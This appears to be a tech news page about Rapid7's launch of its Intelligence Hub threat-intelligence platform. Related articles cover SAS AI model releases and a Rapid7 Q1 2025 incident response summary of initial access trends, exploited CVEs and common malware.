Rapid7 unveils platform to help SOC teams cut through alert noise
Rapid7 has launched Intelligence Hub, a platform intended to equip security teams with actionable intelligence and contextual insights for improved threat detection and response.
The introduction of Intelligence Hub comes amid increasing challenges faced by security teams, with a recent survey indicating that two-thirds of Security Operations Centre (SOC) analysts have experienced a significant rise in the number of security alerts over the past three years. Additionally, 70% of respondents reported a substantial increase in the number of security tools they are required to use.
Intelligence Hub seeks to address industry issues such as fragmented intelligence platforms, lack of contextual information, and difficulties in prioritising security threats. The platform curates data from multiple sources, including Rapid7's proprietary honeypot network and research, as well as open-source communities. According to the company, a particular focus is placed on verifying low-prevalence, high-impact indicators to reduce the occurrence of false positives.
This curated intelligence is available directly in the Rapid7 Command Platform, which enables analysts to incorporate relevant threat information within their existing workflows. The system aims to help teams prioritise the most significant threats and accelerate remediation activities.
Raj Samani, Chief Scientist at Rapid7, commented: "Security organisations are drowning in noise, making timely responses to threats nearly impossible. Intelligence Hub addresses this challenge by focusing on curated intelligence, providing only the most relevant and verified indicators to enable rapid and effective action."
Intelligence Hub offers features designed to help security teams contextualise threats based on the specific industry sector, geographical location, exposure to vulnerabilities, and the tactics and techniques used by threat actors. The methodology for attributing threats is clearly defined to support targeted mitigation strategies and improved resource allocation.
The platform is structured to integrate with existing security tools, including Rapid7's next-generation Security Information and Event Management (SIEM) solution, InsightIDR. By delivering intelligence within established tools, Rapid7 aims to reduce the need for analysts to switch contexts during investigations, potentially leading to faster and more accurate responses.
The company states that Intelligence Hub prioritises the most relevant threats by analysing active attacker campaigns, sector-specific targeting, and exploitability. The intelligence is curated by Rapid7 Labs researchers, combining honeypot data, open-source information, and internal research. The intention is to present security teams with high-fidelity alerts that are most likely to be actionable.
Monika Soltysik, Senior Research Manager at IDC, highlighted some of the broader challenges in the threat intelligence market: "In IDC's October 2024 survey of U.S. organisations, the top three challenges with threat intelligence solutions were cost (42.2%), false positives and alert fatigue (40.0%), and data quality and reliability (39.7%). Solution providers that are proactively addressing these challenges, like Rapid7, are making it easier for their customers to understand and secure their attack surface."
Rapid7 positions Intelligence Hub as a proactive tool for helping organisations cut through data overload, reduce noise, and ensure that resources are allocated to managing verifiable and relevant security threats.
Hashtags
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Techday NZ
18 minutes ago
- Techday NZ
SAS launches AI models after USD $1 billion investment push
SAS has released a set of artificial intelligence models targeting business processes that are traditionally labour-intensive and time-consuming. The launch is part of a USD $1 billion investment by SAS in industry-focused data and AI solutions intended to streamline specific business bottlenecks. The newly introduced models are designed either for immediate deployment or to serve as a foundation that organisations can quickly customise, enabling faster model training on internal data. SAS states that these packaged models are compatible with existing systems and suitable for organisations regardless of size. Model Applications The available models span several industries. For cross-industry use, SAS has presented AI-Driven Entity Resolution and Document Analysis. Within health care, there is a model focused on Medication Adherence Risk, while manufacturing clients have access to Strategic Supply Chain Optimisation. Public sector releases include Payment Integrity for Food Assistance and Tax Compliance for Sales Tax. SAS has indicated that each model was developed according to its Data Ethics Practice guidelines. According to the company, this ensures the resulting outputs are easy for organisations to understand and explain. SAS asserts that users can improve productivity and return on investment as a result of deploying these solutions, while maintaining an adherence to principles of responsible use. Kathy Lange, Research Director at IDC, commented on the nature and flexibility of the SAS Models portfolio. She said, "SAS Models are based on SAS' core assets, talent and intellectual property from its wealth of experience working with customers to solve industry problems. Between its scalability and seamless integration with existing environments, SAS Models are a great option for those looking to accelerate time to production who might lack the expertise or time to build models from scratch." Future Roadmap In addition to the models now available, SAS outlined plans for expanding its industry-specific AI library. Scheduled for later in 2025 are new models addressing needs in banking (Fraud Decisioning for Payments and Card Models), health care (Payment Integrity for HealthCare), manufacturing (Worker Safety Monitoring) and the public sector (Tax Compliance for Individual Income Tax). SAS also announced it is working on "agentic" versions of its models, designed to increase autonomy within business-specific AI solutions. According to SAS, these forthcoming agentic offerings will aim to further reshape operational efficiency by introducing pre-built agents capable of automating complex data preparation processes. Data Preparation Solution The challenge of preparing large volumes of raw data so that it is suitable for AI model training is significant for many organisations. Data scientists often spend extended periods building and refining data lakes—repositories that structure raw customer data for analysis. SAS is responding to this challenge with an AI agent designed to automate complex data preparation processes, thereby facilitating real-time model operation with minimal manual intervention. "We believe the future of AI lies in agents that are not only intelligent but also responsible, ready-to-use and relevant," said Udo Sglavo, VP of Applied AI and Modeling, R&D at SAS. "Our new industry-specific models, built on decades of domain expertise and guided by our ethics-first approach, represent a bold step toward agentic AI: solutions that think with context, act with purpose and deliver real-world impact." Delivery and Integration SAS reports that organisations implementing its models have access to clear, simplified documentation intended to support transparent and responsible use. Each model can be tailored to meet sector-specific requirements and can supplement existing IT and business infrastructures. The release of these new AI models represents the latest step in SAS' long-term development strategy, continuing its aim to address evolving customer priorities across a range of sectors.
Techday NZ
18 minutes ago
- Techday NZ
SAS Viya unveils new AI tools & services to boost productivity
SAS has announced a series of updates and new features on its SAS Viya platform, aimed at enhancing AI-driven productivity and supporting a wider range of users and organisations. Platform updates The SAS Viya platform now provides users with the ability to either build AI through a suite of end-to-end tools or purchase AI solutions and model packages, offering increased flexibility and productivity for decision-making across industries. Kathy Lange, Research Director for AI Software at IDC, commented, "SAS is evolving its strategy and portfolio to embrace a broader ecosystem of user personas, preferences, and technologies within an enterprise's AI technology stack. SAS continues to develop offerings that streamline and automate the AI life cycle and enable organisations to make better business decisions faster." Key releases SAS Data Maker, first introduced through a private preview, is a synthetic data generator designed to help organisations address challenges related to data privacy and scarcity. The tool also aims to simplify data management processes and reduce resource usage. The development of SAS Data Maker was accelerated by SAS's recent acquisition of principal software assets from Hazy, a specialist in synthetic data. General availability for SAS Data Maker is expected in the third quarter of 2025. SAS Viya Intelligent Decisioning, which is currently available, offers organisations the ability to create and deploy intelligent AI agents with a controlled mix of AI autonomy and human involvement. According to SAS, this is intended to ensure appropriate oversight for tasks with varied complexity and risk profiles. Another new addition is SAS Managed Cloud Services: SAS Viya Essentials. This service packages selected SAS Viya products into an out-of-the-box managed cloud environment. Initially targeted at small and medium-sized businesses, SAS Managed Cloud Services: Viya Essentials is intended to reduce barriers to adopting AI solutions by providing an accessible hosted service. The SAS Viya Copilot, an AI-powered conversational assistant, is built into the SAS Viya platform to support developers, data scientists, and business users with analytical, business, and industry tasks. Currently available by invitation through a private preview, the general release is scheduled for the third quarter of 2025. The Copilot offers AI-powered assistance with model development and coding for SAS users. It is built on Azure AI Services, reflecting the ongoing partnership between SAS and Microsoft. SAS Viya Workbench, originally launched in 2024, is a cloud-based environment intended for developers, data scientists, and modellers. The workbench supports coding in SAS and Python via Visual Studio Code or Jupyter Notebook. Updates in 2025 include the addition of R language support, the integration of SAS Enterprise Guide as an optional development environment, and expanded availability to the Microsoft Azure Marketplace in addition to the existing AWS Marketplace. AI in practice SAS has reported that organisations using the Viya platform benefit from the ability to build and deploy AI models more efficiently. The platform's structure allows multiple job functions—including developers, data scientists, IT professionals, and business analysts—to collaborate throughout the data and AI life cycle. SAS suggests this collaboration streamlines the path to making informed business decisions and accelerates productivity across various sectors and regulatory contexts. Referencing industry research, SAS cited a 2024 AI productivity study by Futurum Group: "SAS Viya helps users accelerate the AI life cycle, enabling them to collect data, build models, and deploy decisions 4.6 times faster than selected competitors – all while helping them increase innovation, expedite decision making and drive revenue growth." "The current economic climate and rapid pace of AI innovation can feel intense and overwhelming," said Bryan Harris, Chief Technology Officer at SAS. "Our goal is to deliver cutting-edge AI capabilities that help organisations navigate the hype and disruption, make breakthroughs in problem solving, and gain a decision advantage." Real world usage SAS highlighted the use of its platform by Fathom Science, a start-up focused on marine data analytics. Fathom Science used SAS Data Maker to generate synthetic shipping lane data, expanding their dataset to 500,000 points, in order to validate a model designed to predict whale locations and reduce the risk of vessel strikes on critically endangered North Atlantic right whales. SAS Viya Workbench was used subsequently to develop machine learning models for calculating the probability of whales' proximity to shore, assisting with statistical and machine learning validation of the location prediction model. SAS stated that through these enhancements, the Viya platform aims to support a diverse range of users in addressing real business and environmental challenges efficiently with AI-driven solutions.
Techday NZ
4 days ago
- Techday NZ
Rapid7 Q1 2025 incident response findings
Rapid7's Q1 2025 incident response data highlights several key initial access vector (IAV) trends, shares salient examples of incidents investigated by the Rapid7 Incident Response (IR) team, and digs into threat data by industry as well as some of the more commonly seen pieces of malware appearing in incident logs. Is having no MFA solution in place still one of the most appealing vulnerabilities for threat actors? Will you see the same assortment of malware regardless of whether you work in business services or media and communications? And how big a problem could one search engine query possibly be, anyway? The answer to that last question is "very," as it turns out. As for the rest… Initial access vectors Below, we highlight the key movers and shakers for IAVs across cases investigated by Rapid7's IR team. While you'll notice a fairly even split among several vectors such as exposed remote desktop protocol (RDP) services and SEO poisoning, one in particular is clearly the leader of the pack where compromising organisations is concerned: stolen credentials to valid/active accounts with no multi-factor authentication (MFA) enabled. Valid account credentials — with no MFA in place to protect the organisation should they be misused — are still far and away the biggest stumbling block for organisations investigated by the Rapid7 IR team, occurring in 56% of all incidents this first quarter. Exposed RDP services accounted for 6% of incidents as the IAV, yet they were abused by attackers more generally in 44% of incidents. This tells us that third parties remain an important consideration in an organisation's security hygiene. Valid accounts / no MFA: Top of the class Rapid7 regularly bangs the drum for tighter controls where valid accounts and MFA are concerned. As per the key findings, 56% of all incidents in Q1 2025 involved valid accounts / no MFA as the initial access vector. In fact, there's been very little change since Q3 2024, and as good as no difference between the last two quarters: Vulnerability exploitation: Cracks in the armour Rapid7's IR services team observed several vulnerabilities used, or likely to have been used, as an IAV in Q1 2025. CVE-2024-55591 for example, the IAV for an incident in manufacturing, is a websocket-based race condition authentication bypass affecting Fortinet's FortiOS and FortiProxy flagship appliances. Successful exploitation results in the ability to execute arbitrary CLI console commands as the super_admin user. The CVE-2024-55591 advisory was published at the beginning of 2025, and it saw widespread exploitation in the wild. One investigation revealed attackers using the above flaw to exploit vulnerable firewall devices and create local and administrator accounts with legitimate-looking names (e.g., references to "Admin", "I.T.", "Support"). This allowed access to firewall dashboards, which may have contained useful information about the devices' users, configurations, and network traffic. Policies were created which allowed for leveraging of remote VPN services, and the almost month-long dwell time observed in similar incidents may suggest initial access broker (IAB) activity, or a possible intended progression to data exfiltration and ransomware. Exposed RMM tooling: A path to ransomware As noted above, 6% of IAV incidents were a result of exposed remote monitoring and management (RMM) tooling. RMMs, used to remotely manage and access devices, are often used to gain initial access, or form part of the attack chain leading to ransomware. One investigation revealed a version of SimpleHelp vulnerable to several critical privilege escalation and remote code execution vulnerabilities, which included CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. These CVEs target the SimpleHelp remote access solution. Exploiting CVE-2024-57727 permits an unauthenticated attacker to leak SimpleHelp "technician" password hashes. If one is cracked, the attacker can log-in as a remote-access technician. Lastly, the attacker can exploit CVE-2024-57726 and CVE-2024-57728 to elevate to SimpleHelp administrator and trigger remote code execution, respectively. CVE-2024-57727 was added to CISA KEV in February 2025. The vulnerable RMM solution was used to gain initial access and threat actors used PowerShell to create Windows Defender exclusions, with the ultimate goal of deploying INC Ransomware on target systems. SEO poisoning: When a quick search leads to disaster SEO poisoning, once the scourge of search engines everywhere, may not be high on your list of priorities. However, it still has the potential to wreak havoc on a network. Here, the issue isn't so much rogue entries in regular search results, but instead the paid sponsored ads directly above typical searches. Note how many sponsored results sit above the genuine site related to this incident: Multiple sponsored searches above the official (and desired) search result This investigation revealed a tale of two search results, where one led to a genuine download of a tool designed to monitor virtual environments, and the other led to malware. When faced with both options, a split-second decision went with the latter and what followed was an escalating series of intrusion, data exfiltration and—eventually—ransomware. An imitation website offering malware disguised as genuine software On the same day of initial compromise, the attacker moved laterally using compromised credentials via RDP, installing several RMM tools such as AnyDesk and SplashTop. It is likely that the threat actor searched for insecurely stored password files and targeted password managers. They also attempted to modify and/or disable various security tools in order to evade detection, and create a local account to enable persistence and avoid domain-wide password resets. An unauthorised version of WinSCP was used to exfiltrate a few hundred GB of sensitive company data from several systems, and with this mission accomplished only a few tasks remained. The first: attempting to inhibit system recovery by tampering with the Volume Shadow Copy Service (VSS), clearing event logs, deleting files, and also attempting to target primary backups for data destruction. The second: deployment of Qilin ransomware and a blackmail note instructing the victim to communicate via a TOR link lest the data be published to their leak site. Qilin ranked 7 in our top ransomware groups of Q1 2025 for leak post frequency, racking up 111 posts from January through March. Known for double-extortion attacks across healthcare, manufacturing, and financial sectors, Qilin (who, despite their name, are known not to be Chinese speakers, but rather Russian-speaking) has also recently been seen deployed by North Korean threat actors Moonstone Sleet. Attacker behaviour observations Bunnies everywhere: Tracking a top malware threat BunnyLoader, the Malware as a Service (MaaS) loader possessing a wealth of capabilities including clipboard and credential theft, keylogging, and the ability to deploy additional malware, is one of the most prolific presences Rapid7 has seen this first quarter of 2025. In many cases, it's also daisy-chained to many of the other payloads and tactics which make repeated appearances. To really drive this message home: BunnyLoader is the most observed payload across almost every industry we focused on. Whether we're talking manufacturing, healthcare, business services or finance, it's typically well ahead of the rest of the pack. Here are our findings across the 5 most targeted industries of Q1: BunnyLoader is in pole position not only for the 5 industries shown above, but across 12 of 13 industries overall, with 40% of all incidents observed involving this oft-updated malware. Just over half of that 40% total involved a fake CAPTCHA (commonly used for the purpose of victims executing malicious code), with malicious / compromised sites appearing in a quarter of BunnyLoader cases. Rogue documents, which may be booby-trapped with malware or pave the way for potential phishing attacks, bring up the rear at just 9% of all BunnyLoader appearances recorded. First offered for sale in 2023 for a lifetime-use cost of $250, its continued development and large range of features make it an attractive proposition for rogues operating on a budget. Targeted organisations: The manufacturing magnet Manufacturing organisations were targeted in more than 24% of incidents the Rapid7 IR team observed, by far the most targeted industry in Q1 based on both Rapid7's ransomware analytics and IR team observations. The chart below compares Rapid7's industry-wide data (comprising a wide range of payloads and tactics) with ransomware leak post specific data. In both cases, manufacturing is a fair way ahead of other industries; this reflects its status as one of the most popular targets for ransomware groups over the last couple of years. The manufacturing industry is an attack vector for nation states because it is an important component of global trade. It is also an area that has many legacy and older, operational technologies (OT). Combine unpatched legacy systems with complicated supply chains, and you have a risk that nation state actors will find an attractive target. This is especially the case when considering that many manufacturing organisations have critical contracts with governments, and attacks can cause severe disruption if they're not speedily resolved. Conclusion Q1 2025 resembles a refinement of successful tactics, as opposed to brand new innovations brought to the table. Our Q1 ransomware analytics showed threat actors making streamlined tweaks to a well-oiled machine, and we find many of the same "evolution, not revolution" patterns occurring here. This progression is particularly applicable in the case of initial access via valid accounts with no MFA protection. We expect to see no drop in popularity while businesses continue to leave easy inroads open and available to skilled (and unskilled) attackers. In addition, the risk of severe compromise stemming from seemingly harmless online searches underscores the necessity for organisations to reexamine basic security best practices, alongside deploying robust detection and response capabilities. Businesses addressing these key areas for concern will be better equipped to defend against what should not be an inevitable slide into data exfiltration and malware deployment.
